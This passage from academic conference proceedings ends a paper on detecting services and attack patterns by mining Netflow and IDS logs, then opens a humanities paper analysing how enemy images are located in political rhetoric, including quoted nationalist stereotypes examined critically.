last Wi seconds less than Ti-1 dist<strong>in</strong>ct entries were appended to PD, D is moved to list Li-1. If the<br />
dest<strong>in</strong>ation address D belongs to L0 and dur<strong>in</strong>g the last W0 seconds no entries were added to PD, D is<br />
removed from L0.<br />
It is easy to see that if the dest<strong>in</strong>ation address is actively used by larger number of sources, it will be<br />
promoted to higher level lists, while if the number of active peers decreases, the address will be moved<br />
back to lower levels. If the address <strong>in</strong> L0 has been without peers for W0 seconds, it will be dropped from<br />
memory. Otherwise it will stay <strong>in</strong> one of the lists and have a chance for promotion if its peer activity<br />
<strong>in</strong>creases. If T0 is set to 2, L0 will conta<strong>in</strong> dest<strong>in</strong>ation addresses with only one associated source dur<strong>in</strong>g<br />
the last W0 seconds. S<strong>in</strong>ce the majority of dest<strong>in</strong>ation addresses do not correspond to network services<br />
and appear briefly <strong>in</strong> a few records with one source only (see section 3), they will only stay <strong>in</strong> L0, be<strong>in</strong>g<br />
dropped shortly after W0 seconds. Therefore, the algorithm will not consume large amounts of memory.<br />
Dur<strong>in</strong>g our experiments, we have used the value of 3600 seconds for W0 which represents a good<br />
tradeoff between low memory consumption and service detection precision. We have also set n to 3, W1<br />
to 7200 seconds, both W2 and W3 to 1440 seconds, T0 to 2, T1 to 5, and T2 to 20. In other words, we<br />
have used four lists for dest<strong>in</strong>ation addresses with 1 source dur<strong>in</strong>g 1 hour, with 2-4 sources dur<strong>in</strong>g 2<br />
hours, with 5-19 sources dur<strong>in</strong>g 4 hours, and with 20 or more sources dur<strong>in</strong>g 4 hours.<br />
We have configured the algorithm to produce output <strong>in</strong> several ways:<br />
A web report is created once <strong>in</strong> 5 m<strong>in</strong>utes from dest<strong>in</strong>ations <strong>in</strong> lists L1,…,Ln,<br />
When a new dest<strong>in</strong>ation is created <strong>in</strong> L1 or an entry has stayed <strong>in</strong> L0 for more than K seconds, a<br />
syslog message is produced about the appearance of new service (we have set K to 86400, <strong>in</strong> order<br />
to detect services which have been consistently used by one peer dur<strong>in</strong>g 1 day).<br />
265
Risto Vaarandi<br />
Dur<strong>in</strong>g the experiment of 14 days, the memory consumption of the algorithm was low as we had<br />
expected. The L0, L1, L2, and L3 lists rema<strong>in</strong>ed limited <strong>in</strong> size and conta<strong>in</strong>ed 1054-3845, 95-445, 7-75,<br />
and 45-133 entries, respectively. Also, 6381 syslog messages about the appearance of new services<br />
were logged. However, 3267 (59%) of them were repeated messages about 656 well-known services (<strong>in</strong><br />
most cases, services were rediscovered after nightly peer <strong>in</strong>activity). Among rema<strong>in</strong><strong>in</strong>g 3114 messages,<br />
some were false positives generated by a few network management hosts – s<strong>in</strong>ce these nodes poll<br />
network <strong>in</strong>tensively over SNMP, UDP ports are sometimes reused for creat<strong>in</strong>g client sockets, thus these<br />
ports enter the L1 list and are reported. We believe that if service syslog messages are correlated further,<br />
their number could be reduced several times and false positives could be elim<strong>in</strong>ated.<br />
4.3 Frequent pattern m<strong>in</strong><strong>in</strong>g from IDS logs<br />
As discussed <strong>in</strong> section 2, most data m<strong>in</strong><strong>in</strong>g based algorithms for IDS log analysis have been developed<br />
for dist<strong>in</strong>guish<strong>in</strong>g important events from false positives and other background noise. However, <strong>in</strong> their<br />
recent works Vi<strong>in</strong>ikka, Debar, Mé et al. have argued that it is equally important to detect unanticipated<br />
changes <strong>in</strong> alarm flows (Vi<strong>in</strong>ikka, Debar, Mé and Séguier 2006; Vi<strong>in</strong>ikka, Debar, Mé, Lehiko<strong>in</strong>en and<br />
Tarva<strong>in</strong>en 2009). S<strong>in</strong>ce the algorithm presented <strong>in</strong> section 4.1 detects unexpected strong patterns from<br />
Netflow logs, we also propose this algorithm for IDS log analysis. In this section, we will briefly describe<br />
the experiment results for IDS logs.<br />
Similarly with Netflow logs, after every W seconds the algorithm m<strong>in</strong>es frequent closed patterns from the<br />
IDS log data of last W seconds. Patterns are both stored to file and used for creat<strong>in</strong>g a web report. Also,<br />
patterns which appear <strong>in</strong> less than K of last N pattern files are highlighted.<br />
We have applied the algorithm for an IDS sensor of a large f<strong>in</strong>ancial <strong>in</strong>stitution, with the sensor be<strong>in</strong>g<br />
deployed at the outer network perimeter. We measured the algorithm performance dur<strong>in</strong>g 32 days, with<br />
the support threshold set to 10, W set to 3600 seconds, N set to 96 and K to 12. Dur<strong>in</strong>g the experiment,<br />
5-187 patterns were detected (an average of 22.2 per w<strong>in</strong>dow), and 0-175 patterns were highlighted (an<br />
average of 6.4 per w<strong>in</strong>dow). Figure 2 presents some highlighted alert patterns (for the reasons of privacy,<br />
IP addresses have been obfuscated).<br />
1:2009414 TCP 10.175.178.182 * 10.1.1.1 80<br />
1:2001219 TCP 10.55.173.56 * * 22<br />
1:474 ICMP 10.37.237.66 – 10.1.1.1 –<br />
Figure 2: Sample highlighted IDS alert patterns<br />
The first pattern reflects the Nkiller2 DOS attack from 10.175.178.182 aga<strong>in</strong>st the company web server,<br />
while the second pattern <strong>in</strong>dicates a horizontal SSH scan from 10.55.173.56. The third pattern<br />
corresponds to an ICMP echo scan flood from 10.37.237.66 aga<strong>in</strong>st the company web server. Dur<strong>in</strong>g the<br />
experiments, we found that the algorithm is able to highlight many strong and unexpected attack patterns,<br />
and also provide a concise overview of latest attack trends for the security adm<strong>in</strong>istrator.<br />
5. Conclusion<br />
In this paper, we have presented a study of important properties of IDS and Netflow data sets. We have<br />
also proposed several algorithms for IDS and Netflow log analysis.<br />
For future work, we plan to employ statistical algorithms for measur<strong>in</strong>g unexpected changes <strong>in</strong> supports<br />
of commonly occurr<strong>in</strong>g frequent alert and network traffic patterns. We also <strong>in</strong>tend to elaborate the service<br />
detection algorithm and augment it with event correlation methods. In particular, we are consider<strong>in</strong>g the<br />
creation of Simple Event Correlator (Vaarandi 2006) rules for suppress<strong>in</strong>g repeated service messages<br />
and for verify<strong>in</strong>g with specifically crafted test packets if dest<strong>in</strong>ation addresses are respond<strong>in</strong>g connection<br />
attempts. F<strong>in</strong>ally, our research agenda <strong>in</strong>cludes work on workstation traffic anomaly detection, employ<strong>in</strong>g<br />
some of the methods described <strong>in</strong> this paper.<br />
References<br />
Al-Mamory, S.O., Zhang, H. and Abbas, A.R. (2008) “IDS Alarms Reduction Us<strong>in</strong>g Data M<strong>in</strong><strong>in</strong>g”, Proceed<strong>in</strong>gs of<br />
2008 IEEE World Congress on Computational Intelligence, pp. 3564-3570.<br />
266
Risto Vaarandi<br />
Al-Mamory, S.O and Zhang, H. (2009) “Intrusion Detection Alarms Reduction Us<strong>in</strong>g Root Cause Analysis and<br />
Cluster<strong>in</strong>g”, Computer Communications, vol. 32(2), pp. 419-430.<br />
Clifton, C. and Gengo G. (2000) “Develop<strong>in</strong>g Custom Intrusion Detection Filters Us<strong>in</strong>g Data M<strong>in</strong><strong>in</strong>g”, Proceed<strong>in</strong>gs of<br />
2000 MILCOM Symposium, pp. 440-443.<br />
Julisch, K. (2001) “M<strong>in</strong><strong>in</strong>g Alarm Clusters to Improve Alarm Handl<strong>in</strong>g Efficiency”, Proceed<strong>in</strong>gs of 2001 Annual<br />
Computer <strong>Security</strong> Applications Conference, pp. 12-21.<br />
Julisch, K. (2003) “Cluster<strong>in</strong>g Intrusion Detection Alarms to Support Root Cause Analysis”, ACM Transactions on<br />
Information and System <strong>Security</strong>, vol. 6(4), pp. 443-471.<br />
Julisch, K. and Dacier, M. (2002) “M<strong>in</strong><strong>in</strong>g <strong>in</strong>trusion detection alarms for actionable knowledge”, Proceed<strong>in</strong>gs of 2002<br />
ACM SIGKDD International Conference on Knowledge Discovery and Data M<strong>in</strong><strong>in</strong>g, pp. 366-375.<br />
Li, X. and Deng, Z.-H. (2010) “M<strong>in</strong><strong>in</strong>g Frequent Patterns from Network Flows for Monitor<strong>in</strong>g Network”, Expert<br />
Systems with Applications, vol. 37(10), pp. 8850-8860.<br />
Long, J., Schwartz, D. and Stoeckl<strong>in</strong>, S. (2006) “Dist<strong>in</strong>guish<strong>in</strong>g False from True Alerts <strong>in</strong> Snort by Data M<strong>in</strong><strong>in</strong>g<br />
Patterns of Alerts”, Proceed<strong>in</strong>gs of 2006 SPIE Defense and <strong>Security</strong> Symposium, pp. 62410B-1--62410B-10.<br />
McHugh, J. and Gates, C. (2003) “Locality: A New Paradigm for Th<strong>in</strong>k<strong>in</strong>g About Normal Behavior and Outsider<br />
Threat”, Proceed<strong>in</strong>gs of 2003 New <strong>Security</strong> Paradigms Workshop, pp. 3-10.<br />
Mor<strong>in</strong>, B. and Debar, H. (2003) “Correlation of Intrusion Symptoms: an Application of Chronicles”, Proceed<strong>in</strong>gs of<br />
2003 RAID Symposium, pp. 94-112.<br />
N<strong>in</strong>g, P., Cui, Y. and Reeves, D. S. (2002) “Analyz<strong>in</strong>g Intensive Intrusion Alerts via Correlation”, Proceed<strong>in</strong>gs of 2002<br />
RAID Symposium, pp. 74-94.<br />
Paredes-Oliva, I., Dimitritopoulos, X., Mol<strong>in</strong>a, M., Barlet-Ros, P. and Brauckhoff, D. (2010) “Automat<strong>in</strong>g Root-Cause<br />
Analysis of Network Anomalies us<strong>in</strong>g Frequent Itemset M<strong>in</strong><strong>in</strong>g”, Proceed<strong>in</strong>gs of 2010 SIGCOMM Conference,<br />
pp. 467-468.<br />
Pietraszek, T. (2004) “Us<strong>in</strong>g Adaptive Alert Classification to Reduce False Positives <strong>in</strong> Intrusion Detection”,<br />
Proceed<strong>in</strong>gs of 2004 RAID Symposium, pp. 102-124.<br />
Taylor, T., Paterson, D., Glanfield, J., Gates, C., Brooks, S. and McHugh, J. (2009) “FloVis: Flow Visualization<br />
System”, Proceed<strong>in</strong>gs of 2009 Cybersecurity Applications and Technology Conference for Homeland <strong>Security</strong>,<br />
pp. 186-198.<br />
Tre<strong>in</strong>en, J.J. and Thurimella, R. (2006) “A Framework for the Application of Association Rule M<strong>in</strong><strong>in</strong>g <strong>in</strong> Large<br />
Intrusion Detection Infrastructures”, Proceed<strong>in</strong>gs of 2006 RAID Symposium, pp. 1-18.<br />
Vaarandi, R. (2004) “A Breadth-First Algorithm for M<strong>in</strong><strong>in</strong>g Frequent Patterns from Event Logs”, Proceed<strong>in</strong>gs of 2004<br />
IFIP International Conference on Intelligence <strong>in</strong> Communication Systems, pp. 293-308.<br />
Vaarandi, R. (2006) “Simple Event Correlator for real-time security log monitor<strong>in</strong>g”, Hak<strong>in</strong>9 Magaz<strong>in</strong>e, vol. 1/2006 (6),<br />
pp. 28-39.<br />
Vaarandi, R. (2008) “M<strong>in</strong><strong>in</strong>g Event Logs with SLCT and LogHound”, Proceed<strong>in</strong>gs of 2008 IEEE/IFIP Network<br />
Operations and Management Symposium, pp. 1071-1074.<br />
Vaarandi, R. and Podiņš, K. (2010) “Network IDS Alert Classification with Frequent Itemset M<strong>in</strong><strong>in</strong>g and Data<br />
Cluster<strong>in</strong>g”, Proceed<strong>in</strong>gs of 2010 IEEE Conference on Network and Service Management, pp. 451-456.<br />
Vi<strong>in</strong>ikka, J. and Debar, H. (2004) “Monitor<strong>in</strong>g IDS Background Noise Us<strong>in</strong>g EWMA Control Charts and Alert<br />
Information”, Proceed<strong>in</strong>gs of 2004 RAID Symposium, pp. 166-187.<br />
Vi<strong>in</strong>ikka, J., Debar, H, Mé, L., Lehiko<strong>in</strong>en, A., and Tarva<strong>in</strong>en, M. (2009) “Process<strong>in</strong>g <strong>in</strong>trusion detection alert<br />
aggregates with time series model<strong>in</strong>g”, Information Fusion Journal, vol. 10(4), pp. 312-324.<br />
Vi<strong>in</strong>ikka, J., Debar, H., Mé, L., and Séguier, R. (2006) “Time Series Model<strong>in</strong>g for IDS Alert Management”,<br />
Proceed<strong>in</strong>gs of 2006 ACM Symposium on Information, Computer and Communications <strong>Security</strong>, pp. 102-113.<br />
Wagner, A. (2008) Entropy-Based Worm Detection for Fast IP Networks, PhD Thesis, Swiss Federal Institute of<br />
Technology.<br />
Wagner, C., Wagener, G., State, R., Engel, T. and Dulaunoy, A. (2010) “Game Theory driven monitor<strong>in</strong>g of spatialaggregated<br />
IP-Flow records”, Proceed<strong>in</strong>gs of 2010 IEEE Conference on Network and Service Management, pp.<br />
463-468.<br />
267
Locat<strong>in</strong>g the Enemy<br />
Marja Vuor<strong>in</strong>en<br />
University of Hels<strong>in</strong>ki, F<strong>in</strong>land<br />
marja.vuor<strong>in</strong>en@hels<strong>in</strong>ki.fi<br />
Abstract: Enmity is structured discursively <strong>in</strong> several ways, focuss<strong>in</strong>g on different characteristics and produc<strong>in</strong>g<br />
various sets of concepts. Some of them relate to concrete geographical locations, while others refer to more abstract<br />
sociological and political notions. Some sets of concepts are completely separate from one another, while others are<br />
strongly <strong>in</strong>terrelated and even form <strong>in</strong>terest<strong>in</strong>g comb<strong>in</strong>ations. An Enemy differs from an Other basically by be<strong>in</strong>g<br />
experienced as openly and actually threaten<strong>in</strong>g. When creat<strong>in</strong>g an Other the unwanted features unsuitable for the<br />
Good Self are moulded <strong>in</strong>to a separate form, that is usually considered relatively stable, distant (not imm<strong>in</strong>ently<br />
threaten<strong>in</strong>g) and safe. An Enemy has a similar core, but it is considered actively menac<strong>in</strong>g. Most often it is also<br />
imag<strong>in</strong>ed (or perceived) as approach<strong>in</strong>g: draw<strong>in</strong>g nearer and eventually clos<strong>in</strong>g <strong>in</strong>. To discover an enemy one thus<br />
has to def<strong>in</strong>e a) where it is supposed to be situated and whether or not it is mov<strong>in</strong>g closer, b) how close by it currently<br />
is, and c) whether it operates openly or under cover. This paper explores the location-related concepts that are used<br />
to def<strong>in</strong>e enmity <strong>in</strong> all their variety. It experiments with the idea of <strong>in</strong>tegrat<strong>in</strong>g them all <strong>in</strong>to a s<strong>in</strong>gle system, produc<strong>in</strong>g<br />
a mental map of all the possible locations of potential enemy types. These <strong>in</strong>clude first the enemies from outside: the<br />
traditional military enemies situated outside the borders of a sovereign state, easiest def<strong>in</strong>ed apart from one another<br />
by compass po<strong>in</strong>t. The second species of enemies are the so-called <strong>in</strong>timate enemies – a concept co<strong>in</strong>ed by Vilho<br />
Harle (2000) – resid<strong>in</strong>g with<strong>in</strong> the same society but outside the def<strong>in</strong><strong>in</strong>g group, and divided <strong>in</strong>to sub-species such as<br />
the sociological enemies threaten<strong>in</strong>g ‘from above’ and ‘from below’, the enemies of a movement stand<strong>in</strong>g<br />
symbolically either beh<strong>in</strong>d or ahead of it, and the traditional political enemies from right to left. These sets of subtypes<br />
<strong>in</strong>terrelate <strong>in</strong> many both obvious and unexpected ways. The third and most perilous enemy species is the <strong>in</strong>ternal<br />
enemy, lurk<strong>in</strong>g <strong>in</strong>side the def<strong>in</strong><strong>in</strong>g group itself, weaken<strong>in</strong>g it, spong<strong>in</strong>g on it, or threaten<strong>in</strong>g with sabotage, betrayal or<br />
desertion. Examples of each enemy type are discussed <strong>in</strong> the paper – the geographical ones, due to the author’s<br />
nationality, ma<strong>in</strong>ly from a Northern European perspective, but with excursions to a more general European and<br />
Western experience.<br />
Keywords: enemy images, location, politics, sociology, geography<br />
1. Introduction<br />
This paper came <strong>in</strong>to be<strong>in</strong>g as an extended semantic joke: as an attempt at organis<strong>in</strong>g the figures of<br />
speech po<strong>in</strong>t<strong>in</strong>g out the locations of particular enemies, <strong>in</strong>to a s<strong>in</strong>gle system. By exam<strong>in</strong><strong>in</strong>g historical and<br />
present-day enemies and compar<strong>in</strong>g their actual and symbolical locations, it aims to form a prelim<strong>in</strong>ary<br />
gallery of enemy types, through which other cases of enmity can be further analysed. Rhetorical samples<br />
and historical cases serve as examples and illustrations. They are taken from previous research by<br />
historians and social scientists, or formed through an ongo<strong>in</strong>g observation of contemporary media.<br />
Some of the enmities discussed below have their orig<strong>in</strong> <strong>in</strong> the concrete circumstances of the physical<br />
world, but have later been loaded with cultural connotations and consequently became <strong>in</strong>stitutionalised<br />
<strong>in</strong>to traditional conceptions. Some are metaphorical, abstracted from co<strong>in</strong>cidental occurrence, while<br />
others are by orig<strong>in</strong> symbolic, i.e. agreement-based. How a certa<strong>in</strong> enemy type is located when it is first<br />
encountered, greatly <strong>in</strong>fluences the way how it is experienced and how it develops, as it ga<strong>in</strong>s attributes<br />
from the previous enemies associated with the same location.<br />
The def<strong>in</strong><strong>in</strong>g <strong>in</strong>-group typically places itself <strong>in</strong>to the centre of th<strong>in</strong>gs. Different enemies are situated <strong>in</strong>to<br />
concentric zones around the def<strong>in</strong><strong>in</strong>g centre. The outer circle is <strong>in</strong>habited by the<br />
geographic/political/military enemies of the state or nation, the enemies from outside. It can be further<br />
divided <strong>in</strong>to neighbour<strong>in</strong>g states and others that are situated beyond the immediate neighbours or even<br />
further away. In the next circle <strong>in</strong>wards are the <strong>in</strong>timate enemies: those who live with<strong>in</strong> the same society<br />
but outside the def<strong>in</strong><strong>in</strong>g Self, e.g. ‘the nation’, a particular class or other ideologically conscious <strong>in</strong>-group.<br />
This type of enemy is easily discerned and therefore relatively easy to deal with (Harle 2000: 35). The<br />
most s<strong>in</strong>ister case is the enemy with<strong>in</strong>: an <strong>in</strong>visible threat hid<strong>in</strong>g <strong>in</strong>side the <strong>in</strong>- group community, so far<br />
unidentified and therefore very dangerous as a potential source of unsuspected aggression right <strong>in</strong> the<br />
midst of Us.<br />
The self-explanatory notion of plac<strong>in</strong>g the def<strong>in</strong><strong>in</strong>g Self <strong>in</strong>to the centre of th<strong>in</strong>gs is susceptible to slight<br />
alterations vis-à-vis the location of its def<strong>in</strong>itional opposite. The def<strong>in</strong><strong>in</strong>g <strong>in</strong>-group is not actually quite as<br />
neutral a zero po<strong>in</strong>t as it likes to suggest: it is constantly re-moulded by the ideological opposites it<br />
268
Marja Vuor<strong>in</strong>en<br />
creates for itself. In the end image and counter-image create one another. They become understandable<br />
only <strong>in</strong> their mutual relation (Harle 2000: 15–18).<br />
An extreme way of mark<strong>in</strong>g <strong>in</strong>timate enemies apart is to compel them to wear a badge, e.g. a yellow Star<br />
of David. A military enemy is recognized by alien uniform, equipment and/or ethnic features; its war<br />
mach<strong>in</strong>ery is identifiable by model and <strong>in</strong>signia. This paper does not discuss such crude signals. Instead,<br />
it discusses the <strong>in</strong>ner characteristics given to imag<strong>in</strong>ed enemies, particularly vis-à-vis their symbolic or<br />
actual location. Geographical enemies are exam<strong>in</strong>ed, due to the author’s nationality, ma<strong>in</strong>ly from a<br />
Northern European perspective, but with excursions to a more general European and Western<br />
experience.<br />
Enemy categories are discussed below as seen from outside, as <strong>in</strong>struments of negative identification: as<br />
Others, who at a certa<strong>in</strong> po<strong>in</strong>t of time have become somebody’s Enemies. What we are about to witness<br />
are thus essentially distorted ways of th<strong>in</strong>k<strong>in</strong>g. Noth<strong>in</strong>g is said about whether the perceived threats were<br />
genu<strong>in</strong>e or not. I will also refer to Us as the holders of the def<strong>in</strong><strong>in</strong>g centre, represent<strong>in</strong>g a so-called ironic<br />
we, an <strong>in</strong>-group identity that is imag<strong>in</strong>ed to be constant, but whose essence and position change as<br />
enmities change.<br />
2. How enemies are born and how they differ from others<br />
Enmity and otherness, two identity-creat<strong>in</strong>g, identity-revers<strong>in</strong>g concepts have a lot <strong>in</strong> common. Every<br />
enemy is an Other, but all Others are not enemies. The study of enemy images benefits greatly from<br />
studies concern<strong>in</strong>g otherness. What is said about imag<strong>in</strong>ed Others is equally true about imag<strong>in</strong>ed<br />
Enemies.<br />
The ideas of otherness/enmity are based on the social psychological concept of projection co<strong>in</strong>ed by<br />
Sigmund Freud. Projection beg<strong>in</strong>s with splitt<strong>in</strong>g what is considered evil, weak or faulty apart from the<br />
acceptable psychological and cultural features. The second stage is to remove the unwanted features<br />
from the self by plac<strong>in</strong>g them <strong>in</strong>to an Other (usually someone who actually is slightly different) <strong>in</strong> order to<br />
mentally protect the self. A famous illustration of this phenomenon is the 19 th century concept of the<br />
Orient. Edward Said (1978) demonstrates that the historical Orient was created by colonial Europeans as<br />
a counter-image of everyth<strong>in</strong>g Western, hold<strong>in</strong>g the features the westerners did not wish or dare to<br />
<strong>in</strong>clude <strong>in</strong>to their cherished self-image. Thus the relation between Self and Other is often construed as a<br />
series of dichotomies, e. g. freedom vs. oppression, progress vs. reaction, peace vs. violence, law vs.<br />
lawlessness, culture vs. anarchy/decadence, purity vs. dirt, health vs. sickness, end<strong>in</strong>g with life vs. death<br />
(Vuor<strong>in</strong>en 2002: 266–272; Ehrnrooth 1992: 365–483).<br />
Creat<strong>in</strong>g Others/Enemies is done by establish<strong>in</strong>g stereotypes. Accord<strong>in</strong>g to Stuart Hall (1999) they are<br />
based on convenient exaggeration of select features. A multiform reality is forced <strong>in</strong>to few simple<br />
patterns. The result<strong>in</strong>g banal categories <strong>in</strong>fluence how people belong<strong>in</strong>g to a stereotyped group are<br />
perceived. A vicious circle forms when negative presuppositions ga<strong>in</strong> evidence through seem<strong>in</strong>gly<br />
spontaneous, neutral observation, mak<strong>in</strong>g them seem natural and eternal.<br />
Every community has members whose behaviour is less than perfect. This provides ground for negative<br />
characterisation and makes the negative stereotypes appear partly true, mak<strong>in</strong>g them vex<strong>in</strong>gly longlast<strong>in</strong>g.<br />
On the other hand, most enemy images are so loose-fitt<strong>in</strong>g that different enemies can be<br />
described with similar attributes. Correspond<strong>in</strong>gly, most <strong>in</strong>-group identities appear strik<strong>in</strong>gly similar, with<br />
only m<strong>in</strong>or circumstance-related variations. Goodness, truth, righteousness, purity, proper manners, right<br />
religion and good morals are the hallmarks of the Self. What is natural and normal, genu<strong>in</strong>e and<br />
legitimate, are always ‘our’ qualities (Harle 2000: 13).<br />
The ma<strong>in</strong> difference between Enemy and Other is their supposed activeness/passiveness. When<br />
unwanted features (such as weakness, amorality, stupidity, destructivity, aggression, dirt<strong>in</strong>ess, lack of<br />
organization, and manners or ‘culture’.) are projected away from the Self <strong>in</strong>to an imag<strong>in</strong>ed Other, this set<br />
of bad features is captivated <strong>in</strong>to a form that is both distant and stable, and located not only outside but<br />
also below the Self. As a result the Other can be observed safely and is rarely perceived as actively<br />
threaten<strong>in</strong>g (Said 1978). However, an Enemy cannot be trusted to keep its distance, but is suspected of<br />
approach<strong>in</strong>g, <strong>in</strong> order to kill, destroy, damage and/or steal. The image of an enemy is essentially an<br />
image of a threat – of unwanted acts towards the Self and of their consequences – and of the subsequent<br />
need to rema<strong>in</strong> vigilant, to plan defence or even to attack first.<br />
269
Marja Vuor<strong>in</strong>en<br />
Needless to say, an Enemy is not only threaten<strong>in</strong>g but also Evil, and capable of evil deeds. This<br />
fundamental badness it has <strong>in</strong>herited from its conceptual predecessor, the Other. Imag<strong>in</strong><strong>in</strong>g an Enemy is<br />
a precondition to any contest, as it suggests a possibility and a practical means of deliverance (Mosca<br />
1939: 280).<br />
Discourses of enmity are created, ma<strong>in</strong>ta<strong>in</strong>ed, negotiated and modified by community. Enemy images<br />
can of course appear spontaneously whenever there is a crisis <strong>in</strong>volv<strong>in</strong>g separate groups. Nonetheless,<br />
the most powerful, clear-cut images of enmity usually come <strong>in</strong>to the world as conscious creations of<br />
propaganda mach<strong>in</strong>ery, and are aggressively spread through available media. If they are accepted by the<br />
community, they may become a permanent feature of popular thought, renew<strong>in</strong>g itself with<strong>in</strong> the culture.<br />
Particularly acceptable are images that re<strong>in</strong>force and unite the community by reliev<strong>in</strong>g pressure, e.g.<br />
blam<strong>in</strong>g some obvious social evil on an outside force (Kl<strong>in</strong>ge 1972: 57–131; Alapuro1973; Vuor<strong>in</strong>en<br />
2010a, 2010b).<br />
When an enemy is imag<strong>in</strong>ed/perceived as approach<strong>in</strong>g, it quickly becomes necessary to establish its<br />
relative location vis-à-vis the Self – that is: from what direction and distance it threatens, and how soon.<br />
Unlike an Other, who is usually located below the Self, an Enemy can approach from any direction.<br />
3. Enemies from outside: The geographical compass rose<br />
Enemies that threaten a society from outside the state borders are easy to label non-human. They are<br />
ethnical and cultural strangers, fairly unknown, with little or no reliable first hand <strong>in</strong>formation available. If<br />
there is an ongo<strong>in</strong>g military conflict, or imm<strong>in</strong>ent threat of one, i.e. if the danger caused by the enemy is<br />
immediate and concrete, it is <strong>in</strong> the defend<strong>in</strong>g group’s best <strong>in</strong>terest to strengthen its will to fight by<br />
def<strong>in</strong><strong>in</strong>g the enemy as non-human (Seppälä 2002: 55).<br />
The archetypal eastern enemy of the F<strong>in</strong>nish popular imagery is the Russian/Soviet arch-enemy ryssä<br />
(‘Ruskie’). In an <strong>in</strong>ter-war period poem by Uuno Kailas, Rajalla (“On the frontier”, 1931; Kailas 1977: 239–<br />
241), the enemy resembles a hostile force of nature. As a prose translation the poem goes like this:<br />
The border appears as a crack <strong>in</strong> the ice. In front of me spreads Asia, the East. Beh<strong>in</strong>d me<br />
lie Europe and the West. I protect them as a guard. […] Dreary and cold is the w<strong>in</strong>ter’s night,<br />
freez<strong>in</strong>g the breath of the east. It rem<strong>in</strong>ds us of slavery and forced labour. The stars above<br />
look upon the horror. Far away over the steppes raises the spectre of Ivan the Cruel, an<br />
omen of destruction, herald<strong>in</strong>g a bloody sunrise. […] Never shall the iron-shod feet of the<br />
enemy step on the sacred soil where our heroes rest. Not while I protect my country! Never<br />
shall a stranger wrest away our precious legacy! There is plenty of room here for those dogs<br />
of the steppes: they’ll get buried <strong>in</strong> our soil! As a strong bear I will attack them, throw myself<br />
at their spears, to protect the sp<strong>in</strong>n<strong>in</strong>g-wheels of our women and the cradles of our children!”<br />
The text reads as a collection of dehumaniz<strong>in</strong>g features. The enemy is described as an unclean animal –<br />
a dog, which <strong>in</strong> its negative aspect signifies enslavement and servility <strong>in</strong> obey<strong>in</strong>g a master. It is<br />
contrasted with the image of the Self as a powerful, <strong>in</strong>dependent bear figure, which, <strong>in</strong>cidentally, is the<br />
emblematic animal of F<strong>in</strong>land, and with the image of pure white stars. Other typical features are the de<strong>in</strong>dividualis<strong>in</strong>g<br />
mass-scale presence and ensu<strong>in</strong>g numerical superiority, which of course spells qualitative<br />
<strong>in</strong>feriority. Furthermore, the eastern enemy is pictured cruel and merciless (“iron-shod feet”), morally and<br />
culturally below Us. Its animal nature and physical <strong>in</strong>feriority is associated to aimless loiter<strong>in</strong>g and sexual<br />
promiscuity, result<strong>in</strong>g <strong>in</strong> uncontrolled birth rate and ever-expand<strong>in</strong>g population, lack of discipl<strong>in</strong>e and<br />
greed<strong>in</strong>ess. ‘Ruskies’ as Asians represent a sphere of non-humanity and non-culture (Karemaa 1998;<br />
Vuor<strong>in</strong>en 2005b: 256–259). The image of the eastern hordes spill<strong>in</strong>g over poor defenceless Europe<br />
orig<strong>in</strong>ated <strong>in</strong> the 18 th and 19 th centuries <strong>in</strong> Sweden and central Europe, and has been repeated with<strong>in</strong><br />
nationalist discourses many times s<strong>in</strong>ce (Harle 2000: 68–71). From the German/Nazi po<strong>in</strong>t of view<br />
Russia appeared as an uncultured, under-developed territory, whose decl<strong>in</strong>e was due to the Slavic<br />
Russians’ <strong>in</strong>ability to govern a state by themselves (Vuor<strong>in</strong>en 2010b).<br />
An ancient northern enemy type are the half-legendary Vik<strong>in</strong>gs: tall, strong, heavily armed Norsemen,<br />
who raided the coastal villages of Europe, robb<strong>in</strong>g and burn<strong>in</strong>g and tak<strong>in</strong>g slaves, leav<strong>in</strong>g beh<strong>in</strong>d pillage<br />
and ru<strong>in</strong> (Zilliacus 1989: 183–192). A later representative of the Northern/Nordic enemy is the blond and<br />
muscular Aryan German idealised by Nazi ideologues (Paavola<strong>in</strong>en 1975: 54, 206–212, 233–247). From<br />
the po<strong>in</strong>t of view of the Slavic peoples this was a western enemy, and fits also to that image.<br />
270
Marja Vuor<strong>in</strong>en<br />
It is <strong>in</strong>terest<strong>in</strong>g to note, that Vik<strong>in</strong>gs and Germans (Schivelbusch 2004: 32–33) are pictured similarly<br />
regardless of whether they are perceived as heroes or as enemies. When account<strong>in</strong>g his stay, as a<br />
visit<strong>in</strong>g author, <strong>in</strong> the Third Reich, Olavi Paavola<strong>in</strong>en registers several such double images <strong>in</strong> his<br />
enthusiastic but also ironic book Kolmannen Valtakunnan vieraana (As a guest of the Third Reich, 1936):<br />
”The one hundred percent mascul<strong>in</strong>e, iron hard man-youth of the New Germany […] radiates […] an<br />
unusual spiritual discipl<strong>in</strong>e and a hard, honest manl<strong>in</strong>ess”. The Aryan ideal “<strong>in</strong>voked an image […] of a<br />
powerful, beautiful and healthy generation, free of any depress<strong>in</strong>g notions of quilt and s<strong>in</strong>. The Third<br />
Reich wishes to breed Nordic Hellenes, perfect of race and body, to be the noblest of Europeans”<br />
(Paavola<strong>in</strong>en 1975: 32, 187).<br />
A favourite southern enemy of the present-day Europe, Islam, closely resembles its eastern counterpart<br />
<strong>in</strong> its rapidly expand<strong>in</strong>g population and consequent expansion – <strong>in</strong> the early 21 st -century imagery the big<br />
Muslim families would all but drown Europe – and as a category belong<strong>in</strong>g to the zone of non-civilisation.<br />
Their religion is essentially non-European. Their unbridled political and other passions are described as<br />
those of an uncultured beast rather than a human be<strong>in</strong>g, let alone an adult human. The burqa-clad<br />
woman of the Islam is seen as legally <strong>in</strong>competent, by status resembl<strong>in</strong>g a m<strong>in</strong>or – a victim of her<br />
religion, who has been denied societal and moral adulthood. An Arab man is stereotyped either as a<br />
woman-beater whose psychological development was arrested at puberty, as a religious leader spout<strong>in</strong>g<br />
forth empty threats, or as a politically immature al-Qaida terrorist (Kuusisto 2002). The absoluteness of<br />
this image, and the <strong>in</strong>herent self-understand<strong>in</strong>g, were crystallised by Tony Blair <strong>in</strong> a post-9/11 speech:<br />
This mass terrorism is the new evil <strong>in</strong> our world today. It is perpetrated by fanatics who are<br />
utterly <strong>in</strong>different to the sanctity of human life and we, the democracies of this world, are<br />
go<strong>in</strong>g to have to come together to fight it together and eradicate this evil completely from our<br />
world. […] This is not a battle between the United States and terrorism, but between the free<br />
and democratic world and terrorism (Blair 2001).<br />
